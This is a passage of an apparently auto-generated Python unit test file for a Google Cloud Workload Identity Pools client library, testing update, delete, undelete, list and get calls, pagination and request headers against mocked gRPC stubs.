request = gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
request.workload_identity_pool.name = 'workload_identity_pool.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool.name=workload_identity_pool.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
request.workload_identity_pool.name = 'workload_identity_pool.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool.name=workload_identity_pool.name/value',
) in kw['metadata']
def test_update_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_workload_identity_pool(
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_workload_identity_pool(
gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest(),
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_workload_identity_pool(
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_workload_identity_pool(
gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest(),
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
def test_delete_workload_identity_pool(transport: str = 'grpc', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_workload_identity_pool_from_dict():
test_delete_workload_identity_pool(request_type=dict)
def test_delete_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
client.delete_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_async_from_dict():
await test_delete_workload_identity_pool_async(request_type=dict)
def test_delete_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_workload_identity_pool(
workload_identity_pool.DeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_workload_identity_pool(
workload_identity_pool.DeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
def test_undelete_workload_identity_pool(transport: str = 'grpc', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_undelete_workload_identity_pool_from_dict():
test_undelete_workload_identity_pool(request_type=dict)
def test_undelete_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
client.undelete_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_async_from_dict():
await test_undelete_workload_identity_pool_async(request_type=dict)
def test_undelete_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_undelete_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.undelete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_undelete_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.undelete_workload_identity_pool(
workload_identity_pool.UndeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.undelete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.undelete_workload_identity_pool(
workload_identity_pool.UndeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
def test_list_workload_identity_pool_providers(transport: str = 'grpc', request_type=workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
next_page_token='next_page_token_value',
)
response = client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolProvidersPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_workload_identity_pool_providers_from_dict():
test_list_workload_identity_pool_providers(request_type=dict)
def test_list_workload_identity_pool_providers_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
client.list_workload_identity_pool_providers()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
next_page_token='next_page_token_value',
))
response = await client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolProvidersAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async_from_dict():
await test_list_workload_identity_pool_providers_async(request_type=dict)
def test_list_workload_identity_pool_providers_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse()
client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse())
await client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_workload_identity_pool_providers_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_workload_identity_pool_providers(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_workload_identity_pool_providers_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_workload_identity_pool_providers(
workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_workload_identity_pool_providers(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_workload_identity_pool_providers(
workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest(),
parent='parent_value',
)
def test_list_workload_identity_pool_providers_pager():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_workload_identity_pool_providers(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPoolProvider)
for i in results)
def test_list_workload_identity_pool_providers_pages():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
pages = list(client.list_workload_identity_pool_providers(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async_pager():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
async_pager = await client.list_workload_identity_pool_providers(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPoolProvider)
for i in responses)
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async_pages():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_workload_identity_pool_providers(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_get_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.GetWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE,
disabled=True,
attribute_condition='attribute_condition_value',
aws=workload_identity_pool.WorkloadIdentityPoolProvider.Aws(account_id='account_id_value'),
)
response = client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPoolProvider)
